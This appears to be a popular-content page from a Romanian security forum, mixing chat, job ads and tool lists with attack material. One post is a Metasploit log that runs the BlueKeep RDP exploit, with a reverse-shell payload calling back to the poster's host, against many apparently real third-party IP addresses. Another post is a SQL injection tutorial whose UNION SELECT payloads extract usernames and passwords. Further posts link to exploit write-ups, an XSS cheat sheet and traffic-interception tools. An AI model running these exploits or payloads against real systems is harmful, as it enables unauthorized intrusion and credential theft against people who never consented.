Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 08/17/19 in all areas

  1. 3 points
    Gata frate, i-ati dat cu gugalu in cap, asta a fost ultima lui postare, imi aminteste de vremurile bune ale forumului, nostalgia asta. Cheats for samp si puterea dragostei nu sunt compatibile cu profilul unui meserias priceput in vulnerabilitati web din punctul meu de vedere, cred ca putem fi de acord cu aceasta afirmatie. Trebuie lucrat la mentalitate si apoi la cunostiinte, ce rost are sa folosesti niste vectori si nici sa nu stii ce fac, sau cum poti exploata vulnerabilitatea mai departe, nu te ajuta la nimic, nu demonstrezi nimic, si eu pot sa scriu alea intr-un input si habar nu am ce sa fac mai departe, nu poti fi eligibil pentru un bug bounty pentru ca nu o sa stii sa il repari sau sa demonstrezi ce poti face cu el.
  2. 3 points
    A powerful small guide to deal with Cross-Site Scripting in web applications bug hunting and security assessments Download Link : https://www.pdfdrive.com/xss-cheat-sheet-d158319463.html
  3. 3 points
    Eu am facut ceva de genul acesta pentru Shellcode compiler, insa nu stiu daca metoda mea e cea mai potrivita. In principiu ar trebui sa folosesti niste tokens (e.g. caractere speciale) si in functie de ele sa faci ce ai de facut. Nu stiu sa explic cum functioneaza, insa gasesti tutoriale legate de asa ceva si chiar si implementari de compilere C (basic) si probabil alte limbaje. Ce am facut eu a fost sa definesc un "state machine". Ideea mea e simpla: sunt in starea "x" (de exemplu starea neutra, in care astept ceva util, gen declarare de functie sau apel de functie). Apoi citesc caracter cu caracter in functie de starea mea. In limbajul meu poti defini o functie folosind "function nume_functie(parametri)" iar eu citesc doar caractere alfa numerice pana la un alt caracter. Daca e cuvantul e "function" inseamna ca utilizatorul vrea sa declare o functie si trec in starea de citire de declaratie de functie. Daca e altceva, ma astept sa vrea sa apeleze o functie si trec in starea respectiva. Pentru declararea de functie ma astept sa urmeze un spatiu (sau mai multe, sau tab-uri, in functie de cat de permisiv vrei sa fii). Daca nu sunt, poc, eroare. Daca da, trec in starea de citire a numelui functie (alpha numeric) pana la intalnirea caracterului "(" care indica faptul ca urmeaza parametrii). Si tot asa... Nu stiu care solutie ar fi mai buna, solutia mea mi s-a parut simpla, dar poate sa nu fie cea mai buna si mai practica. Daca vrei sa o folosesti, ia o foaie si un pix si deseneaza state machine-ul, cum vrei sa arate si prin ce caractere in ce alte stari sa ajunga. PS: La trecerea dintre stari trebuie sa salvezi niste date, cum ar fi numele unei functii.
  4. 2 points
  5. 2 points
    Salut, in acest tutorial o sa arat cum putem face un ChatRoom (Cu tot cu host). Pasul 1 - Ne facem cont pe Repl.It (Ne putem loga si cu gmail). Eu am un cont facut special pentru tutoriale pe acest forum. Link: https://repl.it/ Pasul 2 - Facem un repl de Nodejs si il numim "server" (sau ce nume vrem). Pasul 3 - Pe langa index.js facem 2 fisiere numite: package-lock.json; package.json. Pasul 4 - In index.js copypaste la urmatorul cod: https://pastebin.com/pfNEcACv Pasul 5 - In package-lock.json copypaste la urmatorul cod: https://pastebin.com/2dRvEwvt Pasul 6 - In package.json copypaste la urmatorul cod: https://pastebin.com/Fjg073BQ Pasul 7 - Dam run la repl-u' nostru, asteptam sa instaleze tot ce e de instalat si dupa ce termina copiam linku' de la repl-u' nostru (o sa avem nevoie de el mai tarziu): Pasul 8 - Mai facem un repl de nodejs si il numim "ChatRoom" (sau ce nume vrem). Pasul 9 - Pe langa index.js facem 2 fisiere numite: package-lock.json; package.json. Pasul 10 - In index.js copypaste la urmatorul cod: https://pastebin.com/a5j9MPNa Pe linia de cod 4 unde scrie: var socket = io("Link"); in loc de "link" punem link-u' de la repl-u' ce-l facusem inainte. (Repl-u' cu numele server sau ce nume a-ti pus). Pasul 11 - In package-lock.json copypaste la urmatorul cod: https://pastebin.com/sABUuGCB Pasul 12 - In package.json copypaste la urmatorul cod: https://pastebin.com/xtgv9pMr GATA DAM RUN SI DESCHIDEM LINK-U DE LA REPL-U' "CHATROOM" SAU CUM L-ATI NUMIT. SI IL DAM PERSOANEI CU CARE VREM SA COMUNICAM PE ACEL CHATROOM LINK DE LA CHATROOM-UL CE L-AM FACUT PENTRU ACEST TUTORIAL: https://chatroom.tutorialerepl.repl.run/
  6. 2 points
    IMEI NUMBER: *#06# SMS INFO: *#9998*746# TEST MODE:*#0*# SOFTWARE INFORMATION: *#1234# DIAGNOSTIC: *#*#4636#*#* HELP MENU: *#9998*4357# JAVA MENU: *#9998*5282# MEMORY STATUS: *#9998*636# FACTORY RESET: *#*#7780#*#* GPS TEST: *#*#1472365#*#* BATERY CODE: *#0228# AUDIO TEST: *#0673# SERVICE MENU: *#0011# VIEW PHONE LOOK STATUS: *#7465625#
  7. 2 points
    Aveti optiunea de a descarca documentul daca incarcati un altul. Un fel de barter, voi urcati un PDF aleatoriu si in schimb primiti documentul care va intereseaza.
  8. 2 points
    How to Exploit BlueKeep Vulnerability with Metasploit Sep 10, 2019 • Razvan Ionescu, Stefan Bratescu, Cristin Sirbu In this article we show our approach for exploiting the RDP BlueKeep vulnerability using the recently proposed Metasploit module. We show how to obtain a Meterpreter shell on a vulnerable Windows 2008 R2 machine by adjusting the Metasploit module code (GROOMBASE and GROOMSIZE values) because the exploit does not currently work out-of-the-box. Further on, we explain the steps we took to make the module work properly on our target machine: Background Prerequisites Installing the Bluekeep exploit module in Metasploit Preparing the target machine Adjusting the BlueKeep exploit Running the exploit module Conclusions 1. Background BlueKeep is a critical Remote Code Execution vulnerability in Microsoft’s RDP service. Since the vulnerability is wormable, it has caught a great deal of attention from the security community, being in the same category with EternalBlue MS17-010 and Conficker MS08-067. You can read an in-depth analysis of the BlueKeep vulnerability on our blog post. A few days ago, a Metasploit contributor - zerosum0x0 - has submitted a pull request to the framework containing an exploit module for BlueKeep(CVE-2019-0708). The Rapid7 team has also published an article about this exploit on their blog. As of now, the module is not yet integrated into the main Metasploit branch (it’s still a pull request) and it only targets Windows 2008 R2 and Windows 7 SP1, 64-bit versions. Furthermore, the module is now ranked as Manual since the user needs to provide additional information about the target, otherwise it risks of crashing it with BSOD Articol complet: https://pentest-tools.com/blog/bluekeep-exploit-metasploit/
  9. 2 points
    Initial Metasploit Exploit Module for BlueKeep (CVE-2019-0708) by Brent Cook Sep 06, 2019 Today, Metasploit is releasing an initial public exploit module for CVE-2019-0708, also known as BlueKeep, as a pull request on Metasploit Framework. The initial PR of the exploit module targets 64-bit versions of Windows 7 and Windows 2008 R2. The module builds on proof-of-concept code from Metasploit contributor @zerosum0x0, who also contributed Metasploit’s BlueKeep scanner module and the scanner and exploit modules for EternalBlue. Metasploit’s exploit makes use of an improved general-purpose RDP protocol library, as well as enhanced RDP fingerprinting capabilities, both of which will benefit Metasploit users and contributors well beyond the context of BlueKeep scanning and exploitation. As an open-source project, one of Metasploit’s guiding principles is that knowledge is most powerful when shared. Democratic access to attacker capabilities, including exploits, is critical for defenders—particularly those who rely on open-source tooling to understand and effectively mitigate risk. Exploitation notes By default, Metasploit’s BlueKeep exploit only identifies the target operating system version and whether the target is likely to be vulnerable. The exploit does not currently support automatic targeting; it requires the user to manually specify target details before it will attempt further exploitation. If the module is interrupted during exploitation, or if the incorrect target is specified, the target will crash with a bluescreen. Users should also note that some elements of the exploit require knowledge of how Windows kernel memory is laid out, which varies depending on both OS version and the underlying host platform (virtual or physical); the user currently needs to specify this correctly to run the exploit successfully. Server versions of Windows also require a non-default configuration for successful exploitation—namely, changing a registry setting to enable audio sharing. This limitation may be removed in the future. One of the drivers in our releasing the exploit code today as a PR on Metasploit Framework is to enlist the help of the global developer and user community to test, verify, and extend reliability across target environments. As with many Metasploit exploits whose utility has endured over the years, we expect to continue refining the BlueKeep exploit over time. We look forward to working with the Metasploit community to add support for automatic targeting, improve reliability, and expand the range of possible targets. In addition to PoC contributors @zerosum0x0 and @ryHanson, we owe many (many!) enthusiastic thanks to @TheColonial, [@rickoates],(https://twitter.com/rickoates) @zeroSteiner, @TomSellers, @wvu, @bwatters, @sinn3r, and the rest of the Metasploit development team for their invaluable assistance and leadership on development (which included an extensive port of zerosum0x0’s original Python exploit code to Ruby), testing, and integration. New folks interested in joining the list of testers and contributors can get started here! Detection and solution notes Defenders may want to note that BlueKeep exploitation looks similar to a BlueKeep vulnerability scanner at the network level. If your network IDS/IPS is already able to detect the scanner sequence, it almost certainly detects the exploit as well. For host-based IDS/IPS users, the kernel shellcode loads a child process to the Windows process spoolsv.exe by default, which is a similar indicator of compromise to exploits such as EternalBlue (MS17-010). All that said, there's one important caveat for Metasploit payload detection tools, such as those that alert on generic meterpreter payloads in network traffic: If an intrusion prevention system interrupts in-progress BlueKeep exploitation simply because it detects a payload signature against an unpatched target, breaking that network connection will likely crash the target as a side effect, since the exploit code is actually triggered by a network disconnect. Because of this, users are urged to test their IPS against this Metasploit module once the PR is merged into the Framework master branch. While specific defenses and detection against this particular exploit are useful, newer RDP vulnerabilities in the ‘DejaBlue’ family have underscored this protocol in general as a risk. The protocol’s inherent complexity suggests that the known bugs today will not be the last, particularly since exploit developers and researchers now have a more nuanced understanding of RDP and its weaknesses. Continued exploitation is likely, as is increased exploit sophistication. If you still need to use RDP in your environment, then in addition to standard recommendations such as enabling Network Level Authentication, tightening your network access controls will also go a long way toward mitigating future vulnerabilities. The broader security community has emphasized the importance and urgency of patching against CVE-2019-0708. We echo this advice: Rapid7 Labs has previously written about the uptick in malicious RDP activity they have observed since the publication of the BlueKeep vulnerability. Rapid7 Labs has not observed an increased barrage of incoming attacks against RDP past the initial uptick in malicious activity after BlueKeep was published. The chart above looks similar to the Labs team’s previous report on RDP and while activity is at elevated levels when compared to a year ago, overall opportunistic attacker activity is much lower than we expected to see by this point in the post-vulnerability release cycle. Our research partners at BinaryEdge have up-to-date scan results for systems vulnerable to BlueKeep and have indicated they are still observing just over 1 million exposed nodes. For profiles of attacker activity and detailed recommendations on defending against BlueKeep exploitation, see Rapid7’s previous analysis here. About Metasploit and Rapid7 Metasploit is a collaboration between Rapid7 and the open-source community. Together, we empower defenders with world-class offensive security content and the ability to understand, exploit, and share vulnerabilities. For more information, see https://www.metasploit.com. Sursa: https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/amp/?__twitter_impression=true
  10. 2 points
    poti sa te pisi pe el exploit, nu e bun de nimic msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LHOST 185.xxx.xxx.165 LHOST => 185.xxx.xxx.165 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LPORT 4443 LPORT => 4443 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce): Name Current Setting Required Description ---- --------------- -------- ----------- RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random RDP_DOMAIN no The client domain name to report during connect RDP_USER no The username to report during connect, UNSET = random RHOSTS yes The target address range or CIDR identifier RPORT 3389 yes The target port (TCP) Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 185.xxx.xxx.165 yes The listen address (an interface may be specified) LPORT 4443 yes The listen port Exploit target: Id Name -- ---- 0 Automatic targeting via fingerprinting msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set TARGET 1 TARGET => 1 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 14.141.169.229 211.159.157.90 106.12.134.221 213.229.36.215 1.197.204.56 101.91.228.185 23.249.16.157 177.43.21 2.162 139.199.86.136 109.145.192.146 148.70.11.71 110.166.254.99 132.232.224.174 101.89.112.158 50.247.84.178 118.24.118.53 RHOSTS => 14.141.169.229 211.159.157.90 106.12.134.221 213.229.36.215 1.197.204.56 101.91.228.185 23.249.16.157 177.43.212.162 139.199.86.136 109.145.192.146 148.70.11.71 110.16 6.254.99 132.232.224.174 101.89.112.158 50.247.84.178 118.24.118.53 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run [*] Exploiting target 14.141.169.229 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 14.141.169.229:3389 - Detected RDP on 14.141.169.229:3389 (Windows version: 6.0.6003) (Requires NLA: No) [+] 14.141.169.229:3389 - The target is vulnerable. [*] 14.141.169.229:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 14.141.169.229:3389 - Surfing channels ... [*] 14.141.169.229:3389 - Lobbing eggs ... [-] 14.141.169.229:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 211.159.157.90 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 211.159.157.90:3389 - Detected RDP on 211.159.157.90:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 211.159.157.90:3389 - The target is vulnerable. [*] 211.159.157.90:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 211.159.157.90:3389 - Surfing channels ... [-] 211.159.157.90:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 106.12.134.221 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 106.12.134.221:3389 - Detected RDP on 106.12.134.221:3389 (Windows version: N/A) (Requires NLA: No) [*] 106.12.134.221:3389 - Cannot reliably check exploitability. [-] 106.12.134.221:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override [*] Exploiting target 213.229.36.215 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 213.229.36.215:3389 - Detected RDP on 213.229.36.215:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 213.229.36.215:3389 - The target is vulnerable. [*] 213.229.36.215:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 213.229.36.215:3389 - Surfing channels ... [*] 213.229.36.215:3389 - Lobbing eggs ... [-] 213.229.36.215:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 1.197.204.56 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 1.197.204.56:3389 - The target service is not running or refused our connection. [-] 1.197.204.56:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override [*] Exploiting target 101.91.228.185 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 101.91.228.185:3389 - Detected RDP on 101.91.228.185:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 101.91.228.185:3389 - The target is vulnerable. [*] 101.91.228.185:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 101.91.228.185:3389 - Surfing channels ... [*] 101.91.228.185:3389 - Lobbing eggs ... [-] 101.91.228.185:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 23.249.16.157 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 23.249.16.157:3389 - Detected RDP on 23.249.16.157:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 23.249.16.157:3389 - The target is vulnerable. [*] 23.249.16.157:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 23.249.16.157:3389 - Surfing channels ... [*] 23.249.16.157:3389 - Lobbing eggs ... [-] 23.249.16.157:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 177.43.212.162 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 177.43.212.162:3389 - Detected RDP on 177.43.212.162:3389 (Windows version: N/A) (Requires NLA: No) [+] 177.43.212.162:3389 - The target is vulnerable. [-] 177.43.212.162:3389 - Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::RdpCommunicationError [*] Exploiting target 139.199.86.136 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 139.199.86.136:3389 - Detected RDP on 139.199.86.136:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 139.199.86.136:3389 - The target is vulnerable. [*] 139.199.86.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 139.199.86.136:3389 - Surfing channels ... [-] 139.199.86.136:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 109.145.192.146 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 109.145.192.146:3389 - Detected RDP on 109.145.192.146:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 109.145.192.146:3389 - The target is vulnerable. [*] 109.145.192.146:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 109.145.192.146:3389 - Surfing channels ... [*] 109.145.192.146:3389 - Lobbing eggs ... [-] 109.145.192.146:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 148.70.11.71 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 148.70.11.71:3389 - Detected RDP on 148.70.11.71:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 148.70.11.71:3389 - The target is vulnerable. [*] 148.70.11.71:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 148.70.11.71:3389 - Surfing channels ... [-] 148.70.11.71:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 110.166.254.99 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 110.166.254.99:3389 - Cannot reliably check exploitability. [-] 110.166.254.99:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override [*] Exploiting target 132.232.224.174 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 132.232.224.174:3389 - Cannot reliably check exploitability. [-] 132.232.224.174:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override [*] Exploiting target 101.89.112.158 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 101.89.112.158:3389 - Detected RDP on 101.89.112.158:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 101.89.112.158:3389 - The target is vulnerable. [*] 101.89.112.158:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 101.89.112.158:3389 - Surfing channels ... [-] 101.89.112.158:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 50.247.84.178 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 50.247.84.178:3389 - Detected RDP on 50.247.84.178:3389 (Windows version: 6.0.6002) (Requires NLA: No) [+] 50.247.84.178:3389 - The target is vulnerable. [*] 50.247.84.178:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 50.247.84.178:3389 - Surfing channels ... [*] 50.247.84.178:3389 - Lobbing eggs ... [-] 50.247.84.178:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 118.24.118.53 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 118.24.118.53:3389 - Detected RDP on 118.24.118.53:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 118.24.118.53:3389 - The target is vulnerable. [*] 118.24.118.53:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 118.24.118.53:3389 - Surfing channels ... [-] 118.24.118.53:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploit completed, but no session was created.
  11. 2 points
    Salariu :2500 euro Job Title : Firewall Engineer Location : Bucharest, Romania Job Position : 12 Contract FTE Start Date : Immediate Job Description : Your Responsibility as Firewall engineer As a subject matter expert you will: • Execute tasks assigned, autonomously • Be a team member in the squads • Be pro-active, quality driven • Solve incidents • Prepare and implementing changes • Automate (in Ansible and ServiceNow) a number of tasks (example: A request to create Jira project in service-now will create a project in JIRA) with Ansible • Update documentation/procedures Your Experience • Worked on tasks related to changes, automation and any other tasks decided by the business analysts / product owner • Understand Firewall rules, data traffic, routing • Supported various migrations/updates and upgrade activities in Networks • Understand the VMware concept and monitoring • Solved operational tickets w.r.t. Network traffic, Firewall rules end-2-end connectivity • Worked with Ansible • Worked in DevOps, Scrum, Agile • Understand ITIL • Worked with VMware, Linux, Windows environment • Implement best practice • Understand Security. Understand authentication, authorization • Understand, created and implemented Network designs • Knowledge of security scans and (cyber threat) risk assessments • Knowledge of IDS/IPS, WAF and content scanning Your profile: • Academic degree (preferably Technology) • Expert knowledge and understanding of CISCO network architecture and PALO ALTO • Expert knowledge in understanding network traffic, end-2-end connectivity and rules involved • Expert knowledge of network connectivity, concepts, devices, roles. • Expert knowledge on DHCP/Proxy/PEP/EOD/IPNS/DNS, load balancing • Expert knowledge of Network protocols like TCP/IP, HTTP/S, FTP, VPN technology, SSL, routing and switching. • Knowledge on LDAP/eDir • Strong scripting knowledge - Ansible (GIT). • Analytical and good problem-solving skills • Possess a positive and proactive ('can do') attitude • Customer focused and service minded • Work independently while remaining a team player • Presentation skills and ability to work in a global team and communicate effectively with cross-functional team members and customers • Zabbix knowledge (monitoring tool)
  12. 2 points
    Sa zicem ca aveti un site din programul "Big Bounty" si vreti sa incercati un atac MYSQL. Eu am sa pun urmatorul site fictional: https://victimescu.com/index.php?id=5 Pentru a verifica daca site-ul nostru da o eroare Sql trebuie sa punem dupa parametrul .php?.id=5 semnul ('). Daca acesta este vulnerabil va scrie urmatoarea chestie: You have an error in your SQL syntax; check the manual that corresponds to your….. Continued Daca acesta nu este vulnerabil, site-ul nostru va functiona normal. In continuare trebuie sa mergem cu parametrul (ORDER BY ) ca in pasul de mai sus. - Acesta este folosit pentru a verifica cate coloane se afla pe pagina respectiva in baza de date mySQL. https://victimescu.com/index.php?id=5 ORDER BY 5 - Daca pagina noastra functioneaza perfect normal inseamna ca sunt prezente mai mult de 5 coloane in baza de date. Incercam sa marim numarul cu 10. https://victimescu.com/index.php?id=1 ORDER BY 15- Sa zicem ca acum ne va aparea eroarea care ne indica numarul de coloane prezente. Unknown column ’10’ in ‘order clause’Unknown column ’10’ in ‘order clause’ Sa zicem ca pe site-ul nostru fictional avem prezente 9 coloane. Acum continuam doar cu parametrul (UNION SELECT). https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9 In continuare trebuie sa apara 2 numere care indica unde facem injectarea. ------------------------------------------------- Un numar din cele 2 va fi boldit. ------------------------------------------------- Sa zicem ca cele 2 numere sunt 5 si 3 iar cel care ne indica baza de date sau coloana unde trebuie facuta injectarea este 5. https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (table_name),6,7 from information_schema.tables Aceasta comanda ne ajuta sa vedem ce se afla in aceasta baza de date. CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS In continuare pentru a extrage mai multe chestii scriem urmatoarea comanda: https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (column_name),6,7 from information_schema.columns where table_schema=database()- in continuare o sa ne apara: -useri -parole -email-uri -etc https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact(username,0x3a,password),67 from database- Aceasta comanda a fost folosita pentru a afla parola de la panel. ------------------------------------------------- Deseori parola va fi in format MD5 ------------------------------------------------- Acesta a fost tutorialul si sper sa fie folosit in scopuri bune.
  13. 2 points
    Mamaaa, asta m-a invatat pe mine cineva (tot de aici insa nu mai retin nick-ul) acum 5-6 ani cred :-)) (era pe timpul cu rstcenter...) Foarte bun tutorial. O sa caut in pc-ul meu ca aveam ceva syntaxe cu sqli, si le postez tot aici.
  14. 2 points
    da ce lenovo ai ? eu am thinkpad si cred ca este cel mai bun
  15. 2 points
    https://i.imgur.com/FmDymVR.jpg
  16. 2 points
    Daca nu se mai inscriu retardati aici moare complet forumul
  17. 1 point
    Yes noob, please provide a step by step tutorial for PRO haxors!!!
  18. 1 point
    Ai explicat fain,Felicitari si bine ai venit.Incearca sa postezi ceva continut mai ok si nineni nu o sa mai zica nimic.BAFTA!
  19. 1 point
    Daca vrei sa impartasesti cod, poti folosi github care e folosit de toata lumea. Nu mai e nevoie sa faci un tutorial la fiecare proiect si nu e nevoie nici sa-ti tii codul aruncat pe site-uri gen pastebin. Iti dau tutorial introductiv in git & github daca vrei.
  20. 1 point
    Daca vroiai sa le inchizi gura, explicai intr-o maniera profi ce te-a intrebat mai sus c3m3d3, sa fi venit si cu rezolvarea "vulnerabilitatii" respective, nu sa te iei in gura cu ei, ca o baba-n coltu' blocului. Cu aroganta nu faci nimic fara un background solid in spate, acum te vor lua toti la poola.
  21. 1 point
  22. 1 point
    Nu te ajutā nimeni + mentenanţă
  23. 1 point
  24. 1 point
    Tu te intreci cu OKQL? >download scribd o carte >da link de scribd Creca vrea invitatie pe filelist https://www84.zippyshare.com/v/jOTSdyzx/file.html @lauryca
  25. 1 point
    Nu mai bine schimbi fontul acela de "kkt" si postezi în categoria potrivită? Ce buget dispui?
  26. 1 point
    NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption. https://github.com/NytroRST/NetRipper
  27. 1 point
    BetterCAP − BetterCAP is a powerful, flexible and portable tool created to perform various types of MITM attacks against a network, manipulate HTTP, HTTPS and TCP traffic in real-time, sniff for credentials, and much more. DOWNLOAD: https://www.bettercap.org/installation/ Wireshark − It is one of the most widely known and used packet sniffers. It offers a tremendous number of features designed to assist in the dissection and analysis of traffic. DOWNLOAD: https://www.wireshark.org/download.html Tcpdump − It is a well-known command-line packet analyzer. It provides the ability to intercept and observe TCP/IP and other packets during transmission over the network. DOWNLOAD: www.tcpdump.org. MSN Sniffer − It is a sniffing utility specifically designed for sniffing traffic generated by the MSN Messenger application. DOWNLOAD:http://www.msnsniffer.com/ EtherApe − It is a Linux/Unix tool designed to display graphically a system's incoming and outgoing connections. DOWNLOAD: https://etherape.sourceforge.io/ EDITED: NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption. DOWNLOAD: https://github.com/NytroRST/NetRipper THANKS TO @Nytro
  28. 1 point
    Este ok ideea ta, dar totusi ai cumparat un domeniu.Eu in locul tau as incerca sa fac ceva mai creativ decat un site de review-uri la alte host-uri.Incearca sa faci ceva mai "misto" in care sa iti placa sa faci asta si sa ai posibilitatea sa castigi si ceva.
  29. 1 point
    Life is too short to bother with such small and meaningless things like a laptop. Buy an Acer and find perfection in imperfection!!!
  30. 1 point
    Interesanta aceasta chestie. Vreau sa fac un tutorial mai detaliat pe forum despre cum se exploateaza
  31. 1 point
    Le multumesc baietilor insa FileList am. As dori IpTorrents. Multumesc!
  32. 1 point
    Ma de cate ori sa-ti zic ca e super irelevant ce framework folosesti? In realitate observi cu greu diferenta de performanta intre Angular / React / Vue daca nu ai o aplicatie heavy, toate rahaturile astea exista pentru ca in unele poti avea diferite arhitecturi cu care diferite echipe sunt mai confortabile si pot fi mai productivi. Angular e folosit in general de aia ce vin de pe Java si vor sa se simta smecheri cu type-uri pe front-end. Vue e folosit in general de aia ce au incercat sa-nvete React si nu au reusit si dau cu hate spre corporatii ca-i facut de o singura persoana. React e smecher si e folosit de aia ce-s siguri pe ei si stiu Javascript, dar toate fac aceelasi rahat. In toata platforma asta a ta de vrei tu sa o faci cea mai mare problema nu ar trebui sa fie in ce tehnologie o dezvolti ci cum o vinzi. Am dezvoltat niste aplicatii B2B la o companie ce erau de tot rahatul, banale, dar au fost vandute catre Facebook si generau profit de milioane pentru ca oamenii de pe marketing au stiut cum sa-si faca treaba. E mai important sa infasori cacatul intr-o punga frumoasa decat sa faca ceva aplicatia ta. La dracu, in general in industria IT e mai important sa stii sa vorbesti decat sa ai abilitati tehnice. Pune mana si-nvata cum sa bullshit your way around the system. Invata pe cine sa pupi in cur, cand si unde, si nu o sa mai fii nevoit sa te gandesti la ce framework-uri sa alegi. Tu nu observi ca in Silicon Valley cel mai bine platiti nu sunt programatorii ci managerii?
  33. 1 point
  34. 1 point
    ctf-tools This is a collection of setup scripts to create an install of various security research tools. Of course, this isn't a hard problem, but it's really nice to have them in one place that's easily deployable to new machines and so forth. Installers for the following tools are included: Category Tool Description binary afl State-of-the-art fuzzer. binary angr Next-generation binary analysis engine from Shellphish. binary barf Binary Analysis and Reverse-engineering Framework. binary bindead A static analysis tool for binaries. binary checksec Check binary hardening settings. binary codereason Semantic Binary Code Analysis Framework. binary crosstool-ng Cross-compilers and cross-architecture tools. binary cross2 A set of cross-compilation tools from a Japanese book on C. binary elfkickers A set of utilities for working with ELF files. binary elfparser Quickly determine the capabilities of an ELF binary through static analysis. binary evilize Tool to create MD5 colliding binaries binary gdb Up-to-date gdb with python2 bindings. binary gef Enhanced environment for gdb. binary hongfuzz A general-purpose, easy-to-use fuzzer with interesting analysis options. binary libheap gdb python library for examining the glibc heap (ptmalloc) binary panda Platform for Architecture-Neutral Dynamic Analysis. binary pathgrind Path-based, symbolically-assisted fuzzer. binary peda Enhanced environment for gdb. binary preeny A collection of helpful preloads (compiled for many architectures!). binary pwndbg Enhanced environment for gdb. Especially for pwning. binary pwntools Useful CTF utilities. binary python-pin Python bindings for pin. binary qemu Latest version of qemu! binary qira Parallel, timeless debugger. binary radare2 Some crazy thing crowell likes. binary ropper Another gadget finder. binary rp++ Another gadget finder. binary shellnoob Shellcode writing helper. binary shellsploit Shellcode development kit. binary snowman 